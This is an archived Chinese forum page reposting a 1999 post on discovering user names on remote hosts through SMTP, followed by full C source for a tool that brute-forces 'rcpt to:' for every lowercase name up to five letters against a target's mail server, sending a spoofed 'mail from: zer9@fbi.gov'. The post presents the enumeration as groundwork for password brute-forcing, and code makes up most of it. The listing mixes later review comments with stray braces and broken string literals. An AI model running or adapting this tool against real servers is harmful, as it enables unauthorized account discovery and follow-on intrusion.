<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center"> ● UNIX网络编程 (BM: clown) </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="190.htm">上一层</a>][<a href="244.htm">下一篇</a>]
<hr><p align="left"><small>------------------------------------------------------------------------ <br>
---- <br>
小眼睛 于 99-9-29 15:25:06 加贴在 绿盟科技论坛(bbs.nsfocus.com)--UNIX系统安 <br>
全: <br>
<br>
如何获得远程主机上的用户列表 <br>
:作者:zer9 (zer9),时间:1999年05月01日) <br>
<br>
cgi ,anonymous ftp,remote overflow... <br>
当用尽了你所知道的技巧也不能进入站点时, <br>
这时你只有两个选择:1。放弃 2。使用早已被你遗弃 <br>
的暴力法,强行突破。:)(I'd like this 0ne:)但为了 <br>
捍卫hacker的荣誉,当然是不能就此罢休的:) <br>
如果让你从 telnet+/etc/passwd 或一个(或几个)用户名 <br>
+pop3hack你会选哪一样?我选前者。试试就知道了. <br>
<br>
:确定远程主机上的用户名有如下几种方法: <br>
1.通过如finger,ruser之类的服务。 <br>
(如 isp) <br>
2.通过漏洞直接得到/etc/passwd,or the CORE include passwd <br>
(如sunos) <br>
3.通过报纸,杂志慢慢的收集 :) <br>
(如。。。 电脑报 :) <br>
:4.通过sMTp(25). <br>
...(还有什么遗漏的请告诉我哟:) <br>
<br>
一般情况下前两种都是ADM 重点防范的对象,除非是 <br>
那些烂站,第三种你有耐心也可一试; <br>
而第四种则是sMTp 本身固有的缺陷, <br>
再加上sMtp的重要性,几乎绝大多数的站点都没有关闭之。 <br>
这也就成了我们利用的对象。在sMtp 的命令中,有价值 <br>
的有如下几种: VRFY,EXPN,RCPT。都可以利用。 <br>
但我测试的结果RCPt最快。具体程序如下。 <br>
(从防守角度看:VRFY、EXPN 通常可以在邮件服务器配置中关闭;RCPT 是投递邮件所必需的命令,只能靠限制单个会话的收件人数量、对无效收件人的应答做延迟或限速来抑制这类枚举。) <br>
zer9@21 <br>
cn.com <br>
----Cut Here --------------------------------------------------------- <br>
------ <br>
/* 通过"rcpt" 获得远程主机上的用户列表->/etc/passwd <br>
* thr0ugh "rcpt" gain rem0te server's user list <br>
* by <br>
* zer9 <br>
* <br>
* zer9@21cn.com <br>
* <br>
* test on:slackware 2.0.34&irix6.4 <br>
* cc rcpt.c -o rcpt <br>
* 后台运行:nohup ./rcpt <Target>& <br>
*/ <br>
#include <stdio.h> <br>
#include <stdlib.h> <br>
#include <string.h> <br>
#include <netinet/in.h> <br>
#include <sys/types.h> <br>
#include <sys/stat.h> <br>
#include <sys/time.h> <br>
#include <fcntl.h> <br>
#include <netdb.h> <br>
#include <unistd.h> <br>
#include <sys/socket.h> <br>
#include <signal.h> <br>
#include <ctype.h> <br>
#include <arpa/inet.h> <br>
#define SMTPPORT 25 /* TCP port main() connects to */ <br>
#define VERSION "0.08" /* shown in the usage text and written to the log by ver() */ <br>
#define LogFile "./rcpt.log" /* path main() opens in append mode; all results are written here */ <br>
#define TIMEOUT 200 /* argument passed to alarm() before each probe is sent */ <br>
#define SleepTime 1 /* argument passed to sleep() between sending a probe and reading the reply */ <br>
int ver(void); /* writes the program banner to the log stream fp */ <br>
int look_up(int sock,char *string,char *buff); /* logs buff when it contains "ent ok" */ <br>
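/*
 * Send one text line to a connected socket.
 *
 * Copies `string` into a fixed 100-byte buffer, appends a single '\n' and
 * writes the result with one send() call.
 *
 * sock    connected socket descriptor
 * string  NUL-terminated text without a line terminator; at most
 *         sizeof(sendbuf) - 2 bytes, so that the newline and the
 *         terminating NUL still fit
 *
 * Returns 0 when the line was handed to send(), -1 when `string` is NULL,
 * is too long for the buffer, or send() reports an error.
 */
int writeln(int sock,char *string)
{
    char sendbuf[100];
    size_t len;

    if (string == NULL)
        return -1;

    len = strlen(string);

    /*
     * The earlier version called strncpy() with strlen(string) as the bound,
     * which limits nothing: any input of 99 bytes or more wrote past the end
     * of sendbuf. Refuse such input instead of truncating it silently.
     */
    if (len > sizeof(sendbuf) - 2)
        return -1;

    memcpy(sendbuf, string, len);
    sendbuf[len] = '\n';
    sendbuf[len + 1] = '\0';

    if (send(sock, sendbuf, len + 1, 0) < 0)
        return -1;
    return 0;
}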
int s; /* socket descriptor created and connected in main() */ <br>
FILE *fp; /* log stream opened on LogFile in main(); written by main(), look_up() and ver() */ <br>
int main(int argc,char *argv[]) /* Entry point. Takes one argument (host name or dotted address), <br>
 * connects to TCP port SMTPPORT on it, appends the greeting and the replies to <br>
 * help / RSET / HELO / mail from to LogFile, then sends one "rcpt to: X" line <br>
 * for every lowercase a-z string X of length 1 to 5 and passes each reply to <br>
 * look_up(). Returns 0 at the end; returns -1 on a usage, fopen, address, <br>
 * socket, connect or first-recv error, or when the help reply lacks "RCPT". <br>
 * NOTE(review): as archived, the listing contains stray "{" lines, a repeated <br>
 * "return -1;" and string literals wrapped across two lines; these look like <br>
 * paste or line-wrap artefacts and are left exactly as found. <br>
 * Seen from the mail server, the session shows a constant "HELO default" and <br>
 * "mail from: zer9@fbi.gov", then recipients in strict alphabetical order at <br>
 * about one per second (sleep(SleepTime)), with no DATA command ever sent. */ <br>
{ <br>
struct sockaddr_in sin; <br>
struct in_addr Target; <br>
struct hostent *he; <br>
char j; /* not referenced again in this listing */ <br>
char recvbuf[1000],rcpt[200],a[8],hello_Target[500]; /* a[] holds the current candidate name, at most 5 letters plus NUL */ <br>
if(argc!=2) <br>
{ <br>
{ <br>
printf("Rcpt %s by zer9[FTT] mailto: zer9@21cn.com\n",VERSION); <br>
printf("Usage: %s <Target>\n",argv[0]); <br>
return -1; <br>
} <br>
if((fp=fopen(LogFile,"a+"))==NULL) /* results are appended to LogFile in the current directory */ <br>
{ <br>
perror("fopen"); <br>
return -1; <br>
} <br>
if((he=gethostbyname(argv[1]))!=NULL) /* try the argument as a host name first */ <br>
{ <br>
bcopy(he->h_addr,(char *)&Target.s_addr,he->h_length); /* copies h_length bytes into s_addr; assumes an IPv4 answer - TODO confirm */ <br>
} <br>
else <br>
Target.s_addr=inet_addr(argv[1]); /* otherwise parse it as a dotted address */ <br>
if(Target.s_addr==-1) <br>
{ <br>
perror("gethostbyname"); /* prints the errno text; the resolver's own error code is not reported */ <br>
return -1; /* fp stays open on this and the later error returns */ <br>
} <br>
ver(); <br>
fprintf(fp,"@Target: %s ",argv[1]); <br>
if((s=socket(AF_INET,SOCK_STREAM,0))<0) <br>
{ <br>
perror("sock"); <br>
return -1; <br>
} <br>
sin.sin_family=AF_INET; <br>
sin.sin_port=htons(SMTPPORT); <br>
sin.sin_addr.s_addr=Target.s_addr; <br>
if(connect(s,(struct sockaddr*)&sin,sizeof(sin))<0) <br>
{ <br>
perror("connect"); <br>
return -1; <br>
} <br>
bzero(recvbuf,sizeof(recvbuf)); <br>
bzero(rcpt,sizeof(rcpt)); <br>
bzero(a,sizeof(a)); <br>
fprintf(fp,"========================================================= <br>
======\n"); <br>
if(recv(s,recvbuf,sizeof(recvbuf),0)<0) /* get Title (the greeting); a full 1000-byte read would leave recvbuf without a NUL for the %s below */ <br>
{ <br>
perror("recv"); <br>
return -1; <br>
return -1; <br>
} <br>
fprintf(fp,"%s\n",recvbuf); <br>
writeln(s,"help"); <br>
recv(s,recvbuf,sizeof(recvbuf),0); /* return value ignored; recvbuf was not cleared after the greeting, so greeting bytes can trail a shorter reply */ <br>
fprintf(fp,"%s",recvbuf); <br>
if(strstr(recvbuf,"RCPT")==NULL) /* check RCPT: stop unless the help text mentions the command */ <br>
{ <br>
perror("no RCPT command. exit..."); /* perror() appends whatever errno text is current, unrelated to this condition */ <br>
return -1; /* fp and s are not closed on this path */ <br>
} <br>
fprintf(fp,"------------------------------------\n"); <br>
bzero(recvbuf,sizeof(recvbuf)); <br>
writeln(s,"RSET"); <br>
recv(s,recvbuf,sizeof(recvbuf),0); <br>
fprintf(fp,"%s",recvbuf); <br>
strcpy(hello_Target,"HELO "); /* both pieces are constants that fit in hello_Target[500] */ <br>
strcat(hello_Target,"default"); <br>
writeln(s,hello_Target); <br>
recv(s,recvbuf,sizeof(recvbuf),0); <br>
fprintf(fp,"%s",recvbuf); <br>
bzero(recvbuf,sizeof(recvbuf)); <br>
writeln(s,"mail from: zer9@fbi.gov"); /* fixed envelope sender used for the whole session */ <br>
recv(s,recvbuf,sizeof(recvbuf),0); <br>
fprintf(fp,"%s",recvbuf); <br>
fprintf(fp,"------------------------------------\n"); <br>
/* 1 bits: one-letter candidates a..z */ <br>
for(a[0]='a';a[0]<='z';a[0]++) <br>
{ <br>
bzero(recvbuf,sizeof(recvbuf)); <br>
bzero(rcpt,sizeof(rcpt)); <br>
strncpy(rcpt,"rcpt to: ",9); /* copies 9 bytes without a NUL; rcpt was zeroed on the line above */ <br>
sprintf(a,"%c",a[0]); /* rewrites a[] in place as the NUL-terminated candidate */ <br>
strncat(rcpt,a,strlen(a)); <br>
alarm(TIMEOUT); /* no SIGALRM handler is installed in this listing, so expiry would end the process under the default action */ <br>
writeln(s,rcpt); <br>
sleep(SleepTime); /* fixed pause before reading the reply */ <br>
recv(s,recvbuf,sizeof(recvbuf),0); /* return value ignored */ <br>
alarm(0); <br>
look_up(s,rcpt,recvbuf); /* logs the reply when it contains "ent ok" */ <br>
} <br>
/* 2 bits: the same probe sequence for two-letter candidates */ <br>
for(a[0]='a';a[0]<='z';a[0]++) <br>
for(a[1]='a';a[1]<='z';a[1]++) <br>
{ <br>
{ <br>
bzero(recvbuf,sizeof(recvbuf)); <br>
bzero(rcpt,sizeof(rcpt)); <br>
strncpy(rcpt,"rcpt to: ",9); <br>
sprintf(a,"%c%c",a[0],a[1]); <br>
strncat(rcpt,a,strlen(a)); <br>
alarm(TIMEOUT); <br>
writeln(s,rcpt); <br>
sleep(SleepTime); <br>
recv(s,recvbuf,sizeof(recvbuf),0); <br>
alarm(0); <br>
look_up(s,rcpt,recvbuf); <br>
} <br>
/* 3 bits: three-letter candidates */ <br>
for(a[0]='a';a[0]<='z';a[0]++) <br>
for(a[1]='a';a[1]<='z';a[1]++) <br>
for(a[2]='a';a[2]<='z';a[2]++) <br>
{ <br>
bzero(recvbuf,sizeof(recvbuf)); <br>
bzero(rcpt,sizeof(rcpt)); <br>
strncpy(rcpt,"rcpt to: ",9); <br>
sprintf(a,"%c%c%c",a[0],a[1],a[2]); <br>
strncat(rcpt,a,strlen(a)); <br>
alarm(TIMEOUT); <br>
writeln(s,rcpt); <br>
sleep(SleepTime); <br>
recv(s,recvbuf,sizeof(recvbuf),0); <br>
alarm(0); <br>
look_up(s,rcpt,recvbuf); <br>
} <br>
/* 4 bits: four-letter candidates */ <br>
for(a[0]='a';a[0]<='z';a[0]++) <br>
for(a[1]='a';a[1]<='z';a[1]++) <br>
for(a[2]='a';a[2]<='z';a[2]++) <br>
for(a[3]='a';a[3]<='z';a[3]++) <br>
{ <br>
bzero(recvbuf,sizeof(recvbuf)); <br>
bzero(rcpt,sizeof(rcpt)); <br>
strncpy(rcpt,"rcpt to: ",9); <br>
sprintf(a,"%c%c%c%c",a[0],a[1],a[2],a[3]); <br>
strncat(rcpt,a,strlen(a)); <br>
alarm(TIMEOUT); <br>
writeln(s,rcpt); <br>
sleep(SleepTime); <br>
recv(s,recvbuf,sizeof(recvbuf),0); <br>
alarm(0); <br>
look_up(s,rcpt,recvbuf); <br>
} <br>
/* 5 bits: five-letter candidates; with the terminating NUL this uses 6 of the 8 bytes in a[] */ <br>
for(a[0]='a';a[0]<='z';a[0]++) <br>
for(a[1]='a';a[1]<='z';a[1]++) <br>
for(a[2]='a';a[2]<='z';a[2]++) <br>
for(a[3]='a';a[3]<='z';a[3]++) <br>
for(a[4]='a';a[4]<='z';a[4]++) <br>
{ <br>
bzero(recvbuf,sizeof(recvbuf)); <br>
bzero(rcpt,sizeof(rcpt)); <br>
strncpy(rcpt,"rcpt to: ",9); <br>
sprintf(a,"%c%c%c%c%c",a[0],a[1],a[2],a[3],a[4]); <br>
strncat(rcpt,a,strlen(a)); <br>
alarm(TIMEOUT); <br>
writeln(s,rcpt); <br>
sleep(SleepTime); <br>
recv(s,recvbuf,sizeof(recvbuf),0); <br>
alarm(0); <br>
look_up(s,rcpt,recvbuf); <br>
} <br>
} <br>
/*in=fdopen(s,"r"); <br>
writeln(s,"rcpt to: hacker"); <br>
writeln(s,"rcpt to: root"); <br>
writeln(s,"rcpt to: sun"); <br>
writeln(s,"rcpt to: zero"); <br>
writeln(s,"rcpt to: zer0"); <br>
writeln(s,"rcpt to: uucp"); <br>
writeln(s,"rcpt to: 12345"); <br>
writeln(s,"rcpt to: ftp"); <br>
writeln(s,"rcpt to: guest"); <br>
writeln(s,"rcpt to: oracle"); <br>
writeln(s,"rcpt to: 345"); <br>
writeln(s,"rcpt to: uucp"); <br>
writeln(s,"QUIT"); <br>
while(fgets(recvbuf,sizeof(recvbuf),in)!=NULL) <br>
{ <br>
if(strstr(recvbuf,"ok")!=NULL) <br>
printf("%s",recvbuf); <br>
fflush(in); <br>
} <br>
fclose(in); */ <br>
fprintf(fp,"========================================================= <br>
====\n"); <br>
fprintf(fp,"okay!\n\n\n\n\n"); <br>
fclose(fp); <br>
close(s); /* the connection is dropped without a QUIT; the only QUIT is in the commented-out block above */ <br>
return 0; <br>
} <br>
/*
 * Record a server reply in the log when it reports an accepted recipient.
 *
 * sock    accepted for the caller's convenience; not used here
 * string  the command that produced the reply; not used here
 * buff    NUL-terminated reply text to inspect
 *
 * A reply counts as accepted when it contains the substring "ent ok"
 * (sendmail 8.8.7 answers "Recipient ok"). The log stream is flushed on
 * every call, whether or not anything was written. Always returns 0.
 */
int look_up(int sock,char *string,char *buff)
{
    const char *accepted = strstr(buff, "ent ok");

    if (accepted != NULL) {
        fprintf(fp, "%s", buff);
    }

    fflush(fp);
    return 0;
}
/*
 * Write the program banner (a separator row, then name, version and
 * contact address) to the log stream fp. Always returns 0.
 */
int ver(void)
{
    static const char separator[] = "\n###############################\n";

    fputs(separator, fp);
    fprintf(fp, "Rcpt %s by zer9[FTT] mailto: zer9@21cn.com\n", VERSION);
    return 0;
}
---------------------------------------------------------------------------- <br>
---- <br>
</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="190.htm">上一层</a>][<a href="244.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>